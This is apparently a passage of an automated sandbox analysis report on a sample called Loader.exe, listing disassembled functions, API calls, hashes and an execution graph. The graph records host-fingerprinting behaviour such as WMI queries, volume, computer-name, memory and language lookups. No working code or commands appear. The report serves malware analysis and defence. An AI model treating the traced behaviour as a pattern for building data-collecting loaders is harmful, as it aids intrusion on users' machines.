                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                  • Opcode ID: 5495a814d825325f6f01e2831d70c9ab9e60615dde6622276d6eac9c2c7e8b7c
                                                                                                                                                                                                                                                                  • Instruction ID: 39f30396f3819944235dd1a353a9adc8c78ee53768dea8f6299d16deedb6c526
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5495a814d825325f6f01e2831d70c9ab9e60615dde6622276d6eac9c2c7e8b7c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A601883A30D6115E9A041DF6ACC4A9E27B5DB037BC7B0032DF524D5ED0EF63C8666150
                                                                                                                                                                                                                                                                  Function 6CE513D3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,6CE51494,00000000,?,00000001,00000000,?,6CE5150B,00000001,FlsFree,6CE5B344,FlsFree,00000000), ref: 6CE51463
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                                                                                                  • API String ID: 3664257935-2084034818
                                                                                                                                                                                                                                                                  • Opcode ID: f201576d664ed4b2fc786d749429cc553b348ac852289bd7771220191f8d0d7f
                                                                                                                                                                                                                                                                  • Instruction ID: 804e5988385779e8152a602e8d584141c1f81eb65162bdb02567eb5f51065bd8
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f201576d664ed4b2fc786d749429cc553b348ac852289bd7771220191f8d0d7f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA11C631B41665ABDB124EE9CC80B5D37B59F027B8FB50210E916EBB80D7B2ED1486E1
                                                                                                                                                                                                                                                                  Function 6CE51DE7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CE51D99,?,?,6CE51D61,?,00000001,?), ref: 6CE51DFC
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CE51E0F
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,6CE51D99,?,?,6CE51D61,?,00000001,?), ref: 6CE51E32
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                  • Opcode ID: 25820f47b480369f1a0e6bc105cb4f23b785a0a4e25e1d626439f5e760b2d5bf
                                                                                                                                                                                                                                                                  • Instruction ID: e5c131fc4fa4b41ee49cea5d6c46015bab69f52a6707385dfb6bc2c6fda2e457
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 25820f47b480369f1a0e6bc105cb4f23b785a0a4e25e1d626439f5e760b2d5bf
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8F0A031A41218FBDF019F90CD09BAF7BB9EB0435AFB00060F500A2250DB36CE10DBA1
                                                                                                                                                                                                                                                                  Function 6CE576B5 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 6CE576CD
                                                                                                                                                                                                                                                                    • Part of subcall function 6CE52F67: HeapFree.KERNEL32(00000000,00000000,?,6CE52479), ref: 6CE52F7D
                                                                                                                                                                                                                                                                    • Part of subcall function 6CE52F67: GetLastError.KERNEL32(?,?,6CE52479), ref: 6CE52F8F
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 6CE576DF
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 6CE576F1
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 6CE57703
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 6CE57715
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                                  • Opcode ID: f6241910e023049e312c88f68e0e38e09a891206c98c3d582b3ed2bc21506288
                                                                                                                                                                                                                                                                  • Instruction ID: 64f280ece884102f7ca370c36db33f065ca6495034c465c78d85b038f039c609
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f6241910e023049e312c88f68e0e38e09a891206c98c3d582b3ed2bc21506288
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7F04F315153049F8A04CBA8F489C5B33F9EB007187F04809F428E7F40CB33F8A08AA4
                                                                                                                                                                                                                                                                  Function 6CE570DC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 170fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 6CE5686F: GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6CE568B7
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,6CE55099,?,00000000,00000000,6CE5FB78,0000002C,6CE5510A,?), ref: 6CE57222
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 6CE5722C
                                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 6CE5726B
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ConsoleErrorFileLastOutputWrite__dosmaperr
                                                                                                                                                                                                                                                                  • String ID: Ql
                                                                                                                                                                                                                                                                  • API String ID: 910155933-1079734651
                                                                                                                                                                                                                                                                  • Opcode ID: 53a72c140246bbe9c2540fbd9fa4775657eef9545b6ee70a7316d734866f79d5
                                                                                                                                                                                                                                                                  • Instruction ID: 9c218d0bec657721027d927d364ef175d56e89b37a98abff9a89fc91e0fd3a5c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 53a72c140246bbe9c2540fbd9fa4775657eef9545b6ee70a7316d734866f79d5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B851E6B6A10209ABDB018FA5C944FDE7B79EF4631CFB48049E400ABB41D733DA768760
                                                                                                                                                                                                                                                                  Function 6CE53185 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 6CE537A7: _free.LIBCMT ref: 6CE537B5
                                                                                                                                                                                                                                                                    • Part of subcall function 6CE5437B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,6CE56313,?,00000000,00000000), ref: 6CE54427
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 6CE531ED
                                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 6CE531F4
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6CE53233
                                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 6CE5323A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 167067550-0
                                                                                                                                                                                                                                                                  • Opcode ID: 1dc39052506076d9139bf905155369ec25f1cff5de83fec29adf97360038edb9
                                                                                                                                                                                                                                                                  • Instruction ID: 799b903575a36e43ac866806814e451bb7d95830e9768ff04016a1006608ab68
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1dc39052506076d9139bf905155369ec25f1cff5de83fec29adf97360038edb9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3921D671604A05BFD7105F668C8089777BCEF4236C7B48618F91897B40E733ED2587A0
                                                                                                                                                                                                                                                                  Function 6CE52C27 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,6CE56CB7,?,00000001,6CE5510A,?,6CE57171,00000001,?,?,?,6CE55099,?,00000000), ref: 6CE52C2C
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 6CE52C89
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 6CE52CBF
                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,6CE57171,00000001,?,?,?,6CE55099,?,00000000,00000000,6CE5FB78,0000002C,6CE5510A), ref: 6CE52CCA
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLast_free
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2283115069-0
                                                                                                                                                                                                                                                                  • Opcode ID: 04c5caf1d4682b7a5a1be07c1ebc1910a46a7258ced752c5b582ee5ddb1ac4de
                                                                                                                                                                                                                                                                  • Instruction ID: 1aaefc744e81eaef04d3f59bb70d151df1c1f29893636510b0c96217e3841333
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 04c5caf1d4682b7a5a1be07c1ebc1910a46a7258ced752c5b582ee5ddb1ac4de
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3411A7363145016EDA0156BA5CC8E6B267A9BD277C7B50229F524D7BC1DB73C83A8520
                                                                                                                                                                                                                                                                  Function 6CE52D7E Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000001,6CE53050,6CE52F8D,?,?,6CE52479), ref: 6CE52D83
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 6CE52DE0
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 6CE52E16
                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,00000001,6CE53050,6CE52F8D,?,?,6CE52479), ref: 6CE52E21
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLast_free
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2283115069-0
                                                                                                                                                                                                                                                                  • Opcode ID: e7dfeffac2e1f49d501865f2d52ab44c05f2dd5eaab5b8f5519235e3170cf16d
                                                                                                                                                                                                                                                                  • Instruction ID: 96706e9173d4c2c180eae5a842e21151e8b4f9c8d69d0f9595f6a651652e9670
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e7dfeffac2e1f49d501865f2d52ab44c05f2dd5eaab5b8f5519235e3170cf16d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C711EC363145106ED60215B95CC8E6B267ADBD377C7B40228F524D77C0DF338C3A8620
                                                                                                                                                                                                                                                                  Function 6CE57F06 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6CE57960,?,00000001,?,00000001,?,6CE56C46,?,?,00000001), ref: 6CE57F1D
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,6CE57960,?,00000001,?,00000001,?,6CE56C46,?,?,00000001,?,00000001,?,6CE57192,6CE55099), ref: 6CE57F29
                                                                                                                                                                                                                                                                    • Part of subcall function 6CE57EEF: CloseHandle.KERNEL32(FFFFFFFE,6CE57F39,?,6CE57960,?,00000001,?,00000001,?,6CE56C46,?,?,00000001,?,00000001), ref: 6CE57EFF
                                                                                                                                                                                                                                                                  • ___initconout.LIBCMT ref: 6CE57F39
                                                                                                                                                                                                                                                                    • Part of subcall function 6CE57EB1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CE57EE0,6CE5794D,00000001,?,6CE56C46,?,?,00000001,?), ref: 6CE57EC4
                                                                                                                                                                                                                                                                  • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6CE57960,?,00000001,?,00000001,?,6CE56C46,?,?,00000001,?), ref: 6CE57F4E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2744216297-0
                                                                                                                                                                                                                                                                  • Opcode ID: 4584d93ebf3334c297cb5a19a49799a48670bacd8485220eb25fa17ac51699f6
                                                                                                                                                                                                                                                                  • Instruction ID: f815bf2764911ec898b23533df0153bff1f0e4521afef632e37303752d0172b8
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4584d93ebf3334c297cb5a19a49799a48670bacd8485220eb25fa17ac51699f6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7CF0F836660114BBCF566E95DC0499A3F76FB097B4F948014FE1885620CA378930EBA4
                                                                                                                                                                                                                                                                  Function 6CE51E75 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                  • API String ID: 0-2956264872
                                                                                                                                                                                                                                                                  • Opcode ID: 831fca60f33a4c81fe305ee968a15ee7b5bfa31d0ca91bc09d078a424e31a6fa
                                                                                                                                                                                                                                                                  • Instruction ID: c7df9ef5b9b19d5ec2eaf5b3ccca4b0876f43e7dd00f0da025d7061ea56ff8bc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 831fca60f33a4c81fe305ee968a15ee7b5bfa31d0ca91bc09d078a424e31a6fa
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 63418E75E04214AFCB119FD9D8829DEBBB8EF8A708FB4006AE414A7740D7738A64C760
                                                                                                                                                                                                                                                                  Function 6CE56750 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 6CE5660F: EnterCriticalSection.KERNEL32(00000001,?,6CE5704E,?,6CE5FC18,00000010,6CE551AD,00000000,00000000,?,?,?,?,6CE551F1,?,00000000), ref: 6CE5662A
                                                                                                                                                                                                                                                                  • FlushFileBuffers.KERNEL32(00000000,6CE5FBF8,0000000C,6CE56857,Ql,?,00000001,?,6CE5510A,?), ref: 6CE56799
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 6CE567AA
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: BuffersCriticalEnterErrorFileFlushLastSection
                                                                                                                                                                                                                                                                  • String ID: Ql
                                                                                                                                                                                                                                                                  • API String ID: 4109680722-1079734651
                                                                                                                                                                                                                                                                  • Opcode ID: c94376281d31228557a1f3a88f5897e7e479b7cac9262494b7ba7a0be5feed55
                                                                                                                                                                                                                                                                  • Instruction ID: 5d7aec52b2caae7a1c516d2b22fc448f5cde805beddfb7583b09a9f01fc30d8f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c94376281d31228557a1f3a88f5897e7e479b7cac9262494b7ba7a0be5feed55
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F019272A00710CFC7149FB8D94469E7BB4EB49724F60411EE411DB7D0D7B6D9558B50

                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                  Execution Coverage:9.1%
                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                  Signature Coverage:59.6%
                                                                                                                                                                                                                                                                  Total number of Nodes:497
                                                                                                                                                                                                                                                                  Total number of Limit Nodes:38
                                                                                                                                                                                                                                                                  execution_graph 15178 72c38600 15180 72c3860f 15178->15180 15179 72c38a48 ExitProcess 15180->15179 15181 72c38a31 15180->15181 15182 72c38624 GetCurrentProcessId GetCurrentThreadId 15180->15182 15193 72c6e080 15181->15193 15183 72c38650 SHGetSpecialFolderPathW 15182->15183 15184 72c3864c 15182->15184 15186 72c38880 15183->15186 15184->15183 15187 72c38964 GetForegroundWindow 15186->15187 15188 72c38982 15187->15188 15188->15181 15190 72c3b7b0 FreeLibrary 15188->15190 15191 72c3b7cc 15190->15191 15192 72c3b7d1 FreeLibrary 15191->15192 15192->15181 15196 72c6f970 15193->15196 15195 72c6e085 FreeLibrary 15195->15179 15197 72c6f979 15196->15197 15197->15195 15198 72c3e687 15199 72c3e6a0 15198->15199 15204 72c69280 15199->15204 15201 72c3e77a 15202 72c69280 11 API calls 15201->15202 15203 72c3e908 15202->15203 15203->15203 15205 72c692b0 CoCreateInstance 15204->15205 15207 72c69906 15205->15207 15208 72c694e4 SysAllocString 15205->15208 15210 72c69916 GetVolumeInformationW 15207->15210 15211 72c69574 15208->15211 15219 72c69934 15210->15219 15212 72c698f5 SysFreeString 15211->15212 15213 72c6957c CoSetProxyBlanket 15211->15213 15212->15207 15214 72c6959c SysAllocString 15213->15214 15215 72c698eb 15213->15215 15217 72c696a0 15214->15217 15215->15212 15217->15217 15218 72c69701 SysAllocString 15217->15218 15222 72c69728 15218->15222 15219->15201 15220 72c698d6 SysFreeString SysFreeString 15220->15215 15221 72c698cc 15221->15220 15222->15220 15222->15221 15223 72c6976f VariantInit 15222->15223 15225 72c697c0 15223->15225 15224 72c698bb VariantClear 15224->15221 15225->15224 14884 72c3ce45 14885 72c3ce4b 14884->14885 14886 72c3ce55 CoUninitialize 14885->14886 14887 72c3ce80 14886->14887 14887->14887 15226 72c6eb88 15227 72c6eba0 15226->15227 15228 72c6ebde 15227->15228 15233 72c6e110 LdrInitializeThunk 15227->15233 15230 72c6ec4e 15228->15230 15232 72c6e110 LdrInitializeThunk 15228->15232 15232->15230 15233->15228 14888 72c5d34a 14889 72c5d370 14888->14889 14890 72c5d3ea GetPhysicallyInstalledSystemMemory 14889->14890 14891 72c5d410 14890->14891 14891->14891 14892 72c3ef53 CoInitializeEx CoInitializeEx 15234 72c5d893 15235 72c5d896 FreeLibrary 15234->15235 15236 72c5dbc9 15235->15236 15237 72c5dc30 GetComputerNameExA 15236->15237 14893 72c6c55b RtlAllocateHeap 15243 72c39d1e 15244 72c39d40 15243->15244 15244->15244 15245 72c39d94 LoadLibraryExW 15244->15245 15246 72c39da5 15245->15246 15247 72c39e74 LoadLibraryExW 15246->15247 15248 72c39e85 15247->15248 14894 72c6e967 14895 72c6e980 14894->14895 14898 72c6e110 LdrInitializeThunk 14895->14898 14897 72c6e9ef 14898->14897 14899 72c67764 14900 72c6777c 14899->14900 14901 72c6779d GetUserDefaultUILanguage 14900->14901 14902 72c677c7 14901->14902 15249 72c41227 15250 72c41241 15249->15250 15251 72c414e5 RtlExpandEnvironmentStrings 15250->15251 15255 72c3f444 15250->15255 15256 72c41562 